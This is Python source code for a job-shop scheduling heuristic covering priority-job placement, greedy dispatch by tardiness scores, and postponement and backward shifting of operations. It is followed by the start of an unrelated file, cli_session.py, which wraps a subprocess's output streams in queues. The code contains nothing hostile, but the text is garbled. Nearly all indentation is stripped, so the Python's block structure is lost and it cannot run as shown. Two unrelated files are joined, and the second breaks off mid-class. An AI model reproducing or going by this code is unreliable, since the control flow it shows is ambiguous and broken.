# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
for machine_temp in machine_status:
len_op_seq = len(self.op_seq_machines[machine_temp])
for ind_op_seq in range(len_op_seq-1):
if self.end_time_op_macs[machine_temp][ind_op_seq] > self.start_time_op_macs[machine_temp][ind_op_seq+1]:
print('Incorrect start time')
# if new_end_time_op_macs[machine_temp][ind_op_seq] > new_start_time_op_macs[machine_temp][ind_op_seq+1]:
# for ind_op_seq in range(len_op_seq-1):
# for machine_temp in machine_status:
print('checkpoint')
# def init_construction(self, job_status, job_list, machine_status):
def generation_scratch(self, cur_time, job_status, machine_status, coeff_tardiness, rnd_mode):
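"""Build a schedule from scratch: operations of priority jobs are placed first on machines of the
required type while respecting each operation's max_pend_time (rnd_mode == 1 starts from a random
machine), then the remaining ordinary jobs are dispatched by the greedy scoring loop below."""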
#---------------- Priority ----------------#
op_seq_machines = {}
job_seq_machines = {}
start_time_op_macs = {}
end_time_op_macs = {}
mac_assignment_ops = {}
flag_scheduled_ops = np.zeros(self.total_num_ops)
# key_job_list = job_list.keys()
# ready_time_macs = {} # np.zeros(self.total_num_machines)
op_anchor_type_macs = {}
for machine_temp in self.name_macs:
op_seq_machines[machine_temp] = []
job_seq_machines[machine_temp] = []
start_time_op_macs[machine_temp] = []
end_time_op_macs[machine_temp] = []
op_anchor_type_macs[machine_temp] = -1
# ready_time_macs[machine_temp] = 0
# for machine_temp in self.name_macs:
flag_scheduled_jobs = np.zeros(self.num_job)
start_time_ops = -1 * np.ones(self.total_num_ops)
end_time_ops = -1 * np.ones(self.total_num_ops)
ready_time_type_macs = {}
scheduled_length_mac_types = {}
for machine_type_temp in self.machines:
ready_time_type_macs[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp]) # [0 for _ in range(self.num_machine_types[machine_type_temp])]
scheduled_length_mac_types[machine_type_temp] = 0
# for machine_type_temp in self.machines:
occupy_time_type_macs = {}
for mac_type_temp in self.machines:
occupy_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
# for mac_type_temp in self.machines:
for ind_set_job_priority in range(self.size_set_job_priority):
name_job_priority = self.set_job_priority[ind_set_job_priority]
idx_job_priority = int( self.idx_set_job_priority[name_job_priority] )
type_job_priority = self.type_jobs[idx_job_priority]
num_op_job_priority = int( self.num_op_jobs[idx_job_priority] )
idx_first_op_job_priority = self.idx_first_op_jobs[idx_job_priority]
job_constraint_temp = self.arrival_jobs_priority[name_job_priority]
for ind_op_job_priority in range(num_op_job_priority):
idx_op_schedule = int( idx_first_op_job_priority + ind_op_job_priority )
mac_type_op_schedule = self.machine_type_ops[idx_op_schedule]
process_time_op_schedule = self.process_time_mac_jobs[mac_type_op_schedule][type_job_priority]
pend_time_op_schedule = self.job_types[type_job_priority][ind_op_job_priority]['max_pend_time']
# start_time_final = -1
# ind_position_final = -1
count_attempt = 0
num_mac_same_type = self.num_machine_types[mac_type_op_schedule]
idx_mac_op_schedule = np.argmin(occupy_time_type_macs[mac_type_op_schedule])
if rnd_mode == 1:
idx_mac_op_schedule = random.randint(0, num_mac_same_type-1)
# if rnd_mode == 1:
while count_attempt < num_mac_same_type:
mac_op_schedule = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
ind_position_op_schedule = 0
start_time_candidate = -1
while ind_position_op_schedule < len(start_time_op_macs[mac_op_schedule]):
start_time_candidate = job_constraint_temp
if ind_position_op_schedule > 0:
if end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
start_time_candidate = end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1]
# if start_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
# if ind_position_op_schedule > 0:
if start_time_candidate + process_time_op_schedule <= start_time_op_macs[mac_op_schedule][ind_position_op_schedule]:
break
# if start_time_candidate + pend_time_op_schedule <= start_time_op_macs[mac_op_schedule][ind_position_op_schedule]:
ind_position_op_schedule = ind_position_op_schedule + 1
# while ind_position_op_schedule < len(start_time_op_macs[mac_op_schedule]):
if ind_position_op_schedule == len(start_time_op_macs[mac_op_schedule]):
start_time_candidate = job_constraint_temp
if ind_position_op_schedule > 0:
if end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
start_time_candidate = end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1]
# if start_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
# if ind_position_op_schedule > 0:
# if ind_position_op_schedule == len(start_time_op_macs[mac_op_schedule]):
if start_time_candidate == -1:
print('incorrect start time')
# if start_time_candidate == -1:
if start_time_candidate > job_constraint_temp + pend_time_op_schedule:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
else:
# start_time_final = start_time_candidate
# ind_position_final = ind_position_op_schedule
break
# if start_time_candidate > job_constraint_temp + pend_time_op_schedule:
# while count_attempt < num_mac_same_type
start_time_ops[idx_op_schedule] = start_time_candidate
end_time_ops[idx_op_schedule] = start_time_candidate + process_time_op_schedule
op_seq_machines[mac_op_schedule].insert(ind_position_op_schedule, idx_op_schedule)
job_seq_machines[mac_op_schedule].insert(ind_position_op_schedule, name_job_priority)
start_time_op_macs[mac_op_schedule].insert(ind_position_op_schedule, start_time_candidate)
end_time_op_macs[mac_op_schedule].insert(ind_position_op_schedule, end_time_ops[idx_op_schedule])
mac_assignment_ops[idx_op_schedule] = mac_op_schedule
flag_scheduled_ops[idx_op_schedule] = 1
scheduled_length_mac_types[mac_type_op_schedule] = scheduled_length_mac_types[mac_type_op_schedule] + process_time_op_schedule
occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] = occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] + process_time_op_schedule
job_constraint_temp = end_time_ops[idx_op_schedule]
# for ind_op_job_priority in range(num_op_job_priority):
flag_scheduled_jobs[idx_job_priority] = 1
# for ind_job_priority in range(size_set_job_priority):
#---------------- Division ----------------#
average_length_machine_type = {}
max_average_length = -1
# mac_type_max_average_length = None
for machine_temp in self.machines:
coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
average_length_machine_type[machine_temp] = self.total_length_machine_type[machine_temp] * coeff_temp / self.num_machine_available_types[machine_temp]
if average_length_machine_type[machine_temp] > max_average_length:
max_average_length = average_length_machine_type[machine_temp]
# mac_type_max_average_length = machine_temp
# if average_length_machine_type[machine_temp] > max_average_length:
# for machine_temp in self.machines:
# num_mac_max_average_length = self.num_machine_available_types[mac_type_max_average_length]
num_left_job = np.zeros(self.num_job_types)
for ind_job_type in range(self.num_job_types):
job_type_temp = self.keys_job_types[ind_job_type]
num_left_job[ind_job_type] = self.num_jobs_type_idx[job_type_temp] - self.num_type_job_priority[ind_job_type]
if num_left_job[ind_job_type] < 0:
print('incorrect number of jobs')
# if num_dispatch_temp < 0:
# for ind_job_type in range(self.num_job_types):
#---------------- Dispatch ----------------#
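        # Dispatch phase: until every job is scheduled, pick the earliest-ready machine of each
        # type, score the remaining job types by tardiness and combination-length penalties,
        # select the best job, and insert its operations into the chosen machine sequences,
        # postponing already-placed priority operations when that is feasible.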
# num_job_dispatch_mac = group_job_mac.copy()
pos_insertion_macs = {}
op_priority_ref_macs = {}
for mac_type_temp in self.machines:
num_mac_type_temp = self.num_machine_types[mac_type_temp]
# pos_insertion_type_mac[mac_type_temp] = np.zeros(num_mac_type_temp)
for ind_mac_type in range(num_mac_type_temp):
mac_name_temp = self.machines[mac_type_temp][ind_mac_type]
pos_insertion_macs[mac_name_temp] = 0
if len(op_seq_machines[mac_name_temp]) > 0:
op_priority_ref_macs[mac_name_temp] = int( op_seq_machines[mac_name_temp][0] )
else: # len(op_seq_machines[mac_name_temp]) == 0:
op_priority_ref_macs[mac_name_temp] = -1
# if len(op_seq_machines[mac_name_temp]) > 0:
# for ind_mac_type in range(num_mac_type_temp):
# for mac_type_temp in self.machines:
while np.sum(flag_scheduled_jobs) < self.num_job:
# machine set
mac_available_set = {}
ind_mac_available_set = {}
buffer_macs = {}
ready_time_comp = -1
# idx_mac_max_length = -1
for machine_type_temp in self.machines:
ind_mac_type_mac = np.argmin( ready_time_type_macs[machine_type_temp] )
mac_selected_temp = self.machines[machine_type_temp][ind_mac_type_mac]
mac_available_set[machine_type_temp] = mac_selected_temp
ind_mac_available_set[machine_type_temp] = ind_mac_type_mac
if ready_time_comp == -1:
buffer_macs[machine_type_temp] = 0
ready_time_comp = ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
else:
ready_time_cur = ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
buffer_macs[machine_type_temp] = ready_time_cur - ready_time_comp
ready_time_comp = ready_time_cur
# if ready_time_comp == -1:
# for machine_temp in self.machines:
# grade the type of jobs
status_job = 3 * np.ones(self.num_job_types)
score_job = np.zeros((self.num_job_types, 2))
for ind_job_type in range(self.num_job_types):
if num_left_job[ind_job_type] <= 0:
continue
# if num_job_dispatch_mac[idx_mac_max_length, ind_job_type] <= 0:
job_type_temp = self.keys_job_types[ind_job_type]
# sentinel_tardiness = False
# score_consume = np.zeros(self.num_kind_mac-1)
score_comb = np.zeros(self.num_kind_mac)
score_tardiness = np.zeros(self.num_kind_mac)
job_constraint_score = 0
for ind_op_temp in range(self.num_kind_mac):
mac_type_cur = self.keys_mac_types[ind_op_temp]
idx_mac_cur = ind_mac_available_set[mac_type_cur]
mac_score = mac_available_set[mac_type_cur]
process_time_cur_mac = self.process_time_mac_jobs[mac_type_cur][job_type_temp]
if process_time_cur_mac == -1:
process_time_cur_mac = 0
# if process_time_cur_mac == -1:
urgence_coeff_temp = (1.0 + ind_op_temp * 0.2) * (self.total_length_machine_type[mac_type_cur] - scheduled_length_mac_types[mac_type_cur]) / self.num_machine_available_types[mac_type_cur]
start_time_score = job_constraint_score
if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
start_time_score = ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
tardiness_temp = start_time_score - ready_time_type_macs[mac_type_cur][idx_mac_cur]
op_priority_score = op_priority_ref_macs[mac_score]
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
if start_time_score + process_time_cur_mac > start_time_ops[op_priority_score] + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
start_time_score = end_time_ops[op_priority_score]
tardiness_temp = start_time_ops[op_priority_score] - ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score + process_time_cur_mac < start_time_ops[op_priority_score]:
# if op_priority_score != -1
if tardiness_temp > 0:
# sentinel_tardiness = True
score_tardiness[ind_op_temp] = - tardiness_temp * urgence_coeff_temp
# else:
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
length_left = start_time_ops[op_priority_score] - start_time_score - process_time_cur_mac
if length_left > 0:
if length_left < self.length_comb_macs[mac_type_cur][0]:
score_comb[ind_op_temp] = - length_left * urgence_coeff_temp
elif length_left < self.max_length_comb:
idx_plus = -1
for ind_length_comb in range(len(self.length_comb_macs[mac_type_cur])):
if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
idx_plus = ind_length_comb
break
# end if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
# end for ind_length_comb in len(self.length_comb_macs[mac_type_cur]):
if idx_plus == 0:
print('incorrect index')
elif idx_plus != -1:
length_plus = self.length_comb_macs[mac_type_cur][idx_plus]
length_minus = self.length_comb_macs[mac_type_cur][idx_plus-1]
if length_left > length_minus + 0.1 * self.perc_pend_time * max_pend_time_op_priority_score:
score_comb[ind_op_temp] = - (length_plus - length_left) * urgence_coeff_temp
# end if length_left > length_minus + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
# end if idx_plus == 0 or idx_plus == -1:
# end if length_left < self.length_comb_macs[mac_type_cur][0]:
# if length_left > 0:
# if op_priority_score != -1
# if tardiness_temp > 0:
job_constraint_score = start_time_score + process_time_cur_mac
# for ind_op_temp in range(1, num_op_job_temp):
status_job[ind_job_type] = 2
score_job[ind_job_type, 1] = coeff_tardiness * np.sum(score_tardiness) + np.sum(score_comb)
# if sentinel_tardiness == True:
# status_job[ind_job_type] = 2
# score_job[ind_job_type, 1] = np.sum(score_tardiness)
# else:
# status_job[ind_job_type] = 1
# score_job[ind_job_type, 0] = np.sum(score_comb)
# # if sentinel_tardiness == True:
# for ind_job_type in range(self.num_job_types):
# select the type of job
# idx_mac_job_group = idx_mac_max_length
idx_job_type_selected = -1
ind_job_selected = -1
# idx_job_type_first_arrive = -1
# sentinel_job_type = np.zeros(self.num_job_types)
idx_job_type_selected = -1
for ind_job_type in range(self.num_job_types):
if status_job[ind_job_type] >= 3: # or sentinel_job_type[ind_job_type] == 1
continue
# if status_job[ind_job_type] >= 4:
if idx_job_type_selected == -1:
idx_job_type_selected = ind_job_type
else: # if idx_job_type_selected != -1:
if status_job[ind_job_type] < status_job[idx_job_type_selected]:
idx_job_type_selected = ind_job_type
else:
if status_job[ind_job_type] == status_job[idx_job_type_selected]:
if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
# if status_job[ind_job_type] == status_job[idx_job_type_selected]:
# if status_job[ind_job_type] < status_job[idx_job_type_selected]:
# if idx_job_type_selected == -1:
# for ind_job_type in range(self.num_job_types):
if idx_job_type_selected == -1:
print('No proper job type')
# if idx_job_type_selected == -1:
# determine the exact job to be arranged
job_type_selected = self.keys_job_types[idx_job_type_selected]
idx_job_base = self.idx_first_job_types[job_type_selected]
job_name_selected = None
for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1:
continue
# if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1 or self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > 0:
continue
# if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if ind_job_selected == -1:
ind_job_selected = ind_job_selected_type + idx_job_base
job_name_selected = self.name_jobs[ind_job_selected]
break
# if ind_job_selected == -1:
# for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if job_type_selected != self.type_jobs[ind_job_selected]:
print('check job type')
# if job_type_selected != self.type_jobs[ind_job_selected]:
if ind_job_selected == -1:
print('No proper job')
# if ind_job_selected == -1:
# dispatch
job_constraint_temp = self.arrival_time_jobs[ind_job_selected]
ind_first_op_temp = self.idx_first_op_jobs[ind_job_selected]
job_name_selected = self.name_jobs[ind_job_selected]
num_op_temp = int( self.num_op_jobs[ind_job_selected] )
for ind_op_job_temp in range(num_op_temp):
ind_op_schedule = int( ind_first_op_temp + ind_op_job_temp )
mac_type_temp = self.machine_type_ops[ind_op_schedule]
process_time_temp = self.job_types[job_type_selected][ind_op_job_temp]['process_time']
ind_mac_type_mac_temp = ind_mac_available_set[mac_type_temp]
mac_name_temp = mac_available_set[mac_type_temp]
# determine the start time
start_time_candidate = job_constraint_temp
if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
start_time_candidate = ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]
# if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
pos_insert_op_schedule = pos_insertion_macs[mac_name_temp]
op_priority_ref = op_priority_ref_macs[mac_name_temp]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp > start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs)
if sentinel_feasible == True:
start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp]):
op_temp = op_seq_machines[mac_name_temp][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp])
if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_name_temp] = pos_insert_op_schedule
op_priority_ref_macs[mac_name_temp] = op_priority_ref
start_time_ops[ind_op_schedule] = start_time_candidate
end_time_ops[ind_op_schedule] = start_time_ops[ind_op_schedule] + process_time_temp # self.job_types[job_type_init][ind_op_job_temp]['process_time']
op_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, ind_op_schedule)
job_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, job_name_selected)
start_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, start_time_ops[ind_op_schedule])
end_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, end_time_ops[ind_op_schedule])
ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp] = end_time_ops[ind_op_schedule]
op_anchor_type_macs[mac_name_temp] = ind_op_schedule
scheduled_length_mac_types[mac_type_temp] = scheduled_length_mac_types[mac_type_temp] + process_time_temp
mac_assignment_ops[ind_op_schedule] = mac_name_temp
flag_scheduled_ops[ind_op_schedule] = 1
pos_insertion_macs[mac_name_temp] = pos_insertion_macs[mac_name_temp] + 1
job_constraint_temp = end_time_ops[ind_op_schedule]
# for ind_op_job_temp in range(num_op_temp):
flag_scheduled_jobs[ind_job_selected] = 1
num_left_job[idx_job_type_selected] = num_left_job[idx_job_type_selected] - 1
if num_left_job[idx_job_type_selected] < 0:
print('the number of jobs is less than zero')
# if num_job_dispatch_mac[idx_mac_job_group, idx_job_type_selected] < 0:
# while np.sum(flag_scheduled_jobs) < self.num_job:
#---------------- Recording ----------------#
op_max_end_time = np.argmax(end_time_ops)
makespan = end_time_ops[op_max_end_time] # np.max(end_time_ops)
return makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs
# def generation_scratch(self, cur_time, job_status, machine_status):
def postpone_operation(self, cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs):
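        # Simulate postponing the priority operation op_priority_ref so that it starts after the
        # candidate operation finishes, propagating the delay along the affected machine sequences
        # and job successors. Returns a feasibility flag together with trial copies of the timing
        # tables; the caller commits them only when the postponement is feasible.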
sentinel_feasible = True
start_time_ops_trial = copy.deepcopy(start_time_ops)
end_time_ops_trial = copy.deepcopy(end_time_ops)
start_time_op_macs_trial = copy.deepcopy(start_time_op_macs)
end_time_op_macs_trial = copy.deepcopy(end_time_op_macs)
ready_time_type_macs_trial = copy.deepcopy(ready_time_type_macs)
# update the start time and the end time of the postponed operation
ind_job_op_priority_ref = self.ind_job_ops[op_priority_ref]
ind_op_op_priority_ref = self.ind_op_ops[op_priority_ref]
mac_op_priority_ref = mac_assignment_ops[op_priority_ref]
process_time_op_priority_ref = self.process_time_ops[op_priority_ref]
start_time_ops_trial[op_priority_ref] = start_time_candidate + process_time_temp
end_time_ops_trial[op_priority_ref] = start_time_ops_trial[op_priority_ref] + process_time_op_priority_ref
if op_priority_ref not in op_seq_machines[mac_op_priority_ref]:
print('wrong processing sequence')
# if op_priority_ref not in op_seq_machines[mac_op_priority_ref]:
idx_seq_op_priority_ref = op_seq_machines[mac_op_priority_ref].index(op_priority_ref)
start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref] = start_time_ops_trial[op_priority_ref]
end_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref] = end_time_ops_trial[op_priority_ref]
# simulate the influence
mac_influence_list = []
ind_influence_list = []
if idx_seq_op_priority_ref + 1 < len(op_seq_machines[mac_op_priority_ref]):
if end_time_ops_trial[op_priority_ref] > start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref + 1]:
mac_influence_list.append(mac_op_priority_ref)
ind_influence_list.append(idx_seq_op_priority_ref + 1)
# if end_time_ops_trial[op_priority_ref] > start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref + 1]:
# if idx_seq_op_priority_ref + 1 < len(op_seq_machines[mac_op_priority_ref]):
if ind_op_op_priority_ref + 1 < self.num_op_jobs[ind_job_op_priority_ref]:
op_suc_temp = op_priority_ref + 1
if start_time_ops_trial[op_suc_temp] != -1:
if end_time_ops_trial[op_priority_ref] > start_time_ops_trial[op_suc_temp]:
mac_op_suc = mac_assignment_ops[op_suc_temp]
idx_seq_op_suc = op_seq_machines[mac_op_suc].index(op_suc_temp)
mac_influence_list.append(mac_op_suc)
ind_influence_list.append(idx_seq_op_suc)
# if end_time_ops_trial[op_priority_ref] > start_time_ops_trial[op_suc_temp]:
# if start_time_ops_trial[op_suc_temp] != -1:
# if ind_op_op_priority_ref + 1 < self.num_op_jobs[ind_job_op_priority_ref]:
while len(mac_influence_list) > 0:
mac_alter_op = mac_influence_list[0]
idx_alter_op = ind_influence_list[0]
op_alter = op_seq_machines[mac_alter_op][idx_alter_op]
ind_job_op_alter = self.ind_job_ops[op_alter]
# name_job_op_alter = self.name_jobs[ind_job_op_alter]
# job_type_op_alter = self.type_jobs[ind_job_op_alter] # job_status[name_job_op_alter]['type']
ind_op_op_alter = self.ind_op_ops[op_alter]
process_time_alter = self.process_time_ops[op_alter] # self.job_types[job_type_op_alter][ind_op_op_alter]['process_time']
if idx_alter_op > 0:
start_time_ops_trial[op_alter] = end_time_op_macs_trial[mac_alter_op][idx_alter_op - 1]
else:
start_time_ops_trial[op_alter] = 0
# if idx_alter_op > 0:
max_pend_time_op_alter = self.max_pend_time_ops[op_alter]
job_constraint_op_alter = self.arrival_time_jobs[ind_job_op_alter]
if ind_op_op_alter > 0:
job_constraint_op_alter = end_time_ops_trial[op_alter - 1]
# if ind_op_op_alter > 0:
if job_constraint_op_alter > start_time_ops_trial[op_alter]:
start_time_ops_trial[op_alter] = job_constraint_op_alter
# if end_time_ops[op_alter - 1] >
if start_time_ops_trial[op_alter] < cur_time:
start_time_ops_trial[op_alter] = cur_time
# if start_time_ops_trial[op_alter] < cur_time:
if self.priority_jobs[ind_job_op_alter] > 0 and start_time_ops_trial[op_alter] > job_constraint_op_alter + max_pend_time_op_alter:
sentinel_feasible = False
break
# if start_time_ops_trial[op_alter] > job_constraint_op_alter + max_pend_time_op_alter:
end_time_ops_trial[op_alter] = start_time_ops_trial[op_alter] + process_time_alter
start_time_op_macs_trial[mac_alter_op][idx_alter_op] = start_time_ops_trial[op_alter]
end_time_op_macs_trial[mac_alter_op][idx_alter_op] = end_time_ops_trial[op_alter]
mac_type_op_alter = machine_status[mac_alter_op]['type']
hash_ind_mac_op_alter = self.hash_ind_mac_types[mac_alter_op]
if op_anchor_type_macs[mac_alter_op] == op_alter:
ready_time_type_macs_trial[mac_type_op_alter][hash_ind_mac_op_alter] = end_time_ops_trial[op_alter]
# if op_anchor_type_macs[mac_alter_op] == op_alter:
if idx_alter_op + 1 < len(op_seq_machines[mac_alter_op]):
if end_time_ops_trial[op_alter] > start_time_op_macs_trial[mac_alter_op][idx_alter_op + 1]:
mac_influence_list.append(mac_alter_op)
ind_influence_list.append(idx_alter_op+1)
# if end_time_ops_trial[op_alter] > start_time_op_macs_trial[mac_alter_op][idx_alter_op + 1]:
# if idx_alter_op + 1 == len(op_seq_machines[mac_alter_op]):
if ind_op_op_alter + 1 < self.num_op_jobs[ind_job_op_alter]:
op_suc_temp = op_alter + 1
if start_time_ops_trial[op_suc_temp] != -1:
if end_time_ops_trial[op_alter] > start_time_ops_trial[op_suc_temp]:
mac_op_suc = mac_assignment_ops[op_suc_temp]
pos_op_suc = op_seq_machines[mac_op_suc].index(op_suc_temp)
mac_influence_list.append(mac_op_suc)
ind_influence_list.append(pos_op_suc)
# if end_time_ops[op_alter] >
# if start_time_ops_trial[op_suc_temp] != -1:
# if ind_op_op_alter + 1 < self.num_op_jobs[ind_job_op_alter]:
mac_influence_list.pop(0)
ind_influence_list.pop(0)
# while len(mac_influence_list) > 0:
return sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial
# def postpone_operation(self, cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs):
def priority_backward(self, cur_time, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, ind_op_job_priority, start_time_candidate, pend_time_op_schedule, idx_first_op_job_priority, idx_job_priority, new_mac_assignment_ops, new_op_seq_machines):
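        # Shift the earlier operations of the priority job later (towards the candidate start
        # time) so that the maximum pending time between consecutive operations is respected.
        # Returns a feasibility flag and trial copies of the timing tables.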
sentinel_feasible = False
start_time_ops_trial = copy.deepcopy(new_start_time_ops)
end_time_ops_trial = copy.deepcopy(new_end_time_ops)
start_time_op_macs_trial = copy.deepcopy(new_start_time_op_macs)
end_time_op_macs_trial = copy.deepcopy(new_end_time_op_macs)
# ready_time_type_macs_trial = copy.deepcopy(ready_time_type_macs)
ind_op_backward = ind_op_job_priority - 1
start_time_op_cur = start_time_candidate
pend_time_op_cur = pend_time_op_schedule
while ind_op_backward >= 0:
op_pred = int(idx_first_op_job_priority + ind_op_backward)
earliest_end_time_op_pred = start_time_op_cur - pend_time_op_cur
earliest_start_time_op_pred = earliest_end_time_op_pred - self.process_time_ops[op_pred]
mac_op_pred = new_mac_assignment_ops[op_pred]
pos_mac_op_pred = new_op_seq_machines[mac_op_pred].index(op_pred)
if start_time_ops_trial[op_pred] < cur_time or earliest_start_time_op_pred < cur_time:
break
# if new_start_time_ops[op_pred] < cur_time:
if start_time_ops_trial[op_pred] > earliest_start_time_op_pred:
print('incorrect backward')
else:
start_time_ops_trial[op_pred] = earliest_start_time_op_pred
end_time_ops_trial[op_pred] = earliest_end_time_op_pred
start_time_op_macs_trial[mac_op_pred][pos_mac_op_pred] = earliest_start_time_op_pred
end_time_op_macs_trial[mac_op_pred][pos_mac_op_pred] = earliest_end_time_op_pred
# if new_start_time_ops[op_pred] > earliest_start_time_op_pred:
job_constraint_op_pred = self.arrival_time_jobs[idx_job_priority]
if ind_op_backward > 0:
job_constraint_op_pred = end_time_ops_trial[op_pred-1]
# if ind_op_backward > 0:
pend_time_op_pred = self.max_pend_time_ops[op_pred]
if earliest_start_time_op_pred <= job_constraint_op_pred + pend_time_op_pred:
sentinel_feasible = True
break
# if earliest_start_time_op_pred <= job_constraint_op_pred + pend_time_op_pred:
start_time_op_cur = earliest_start_time_op_pred
pend_time_op_cur = pend_time_op_pred
ind_op_backward = ind_op_backward - 1
# while ind_op_backward > 0:
return sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial
# def priority_backward
|
cli_session.py
|
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class CliSession():
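    # Wraps an interactive CLI subprocess: stdout and stderr are drained into queues by two
    # daemon threads, so do()/outputs()/errors() can collect whatever output is available
    # without blocking on the pipes.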
def __init__(self, process):
self.process = process
self.stdout = Queue()
self.stderr = Queue()
self.thread_out = Thread(target=self.__enqueue_output, args=(process.stdout, self.stdout))
self.thread_err = Thread(target=self.__enqueue_output, args=(process.stderr, self.stderr))
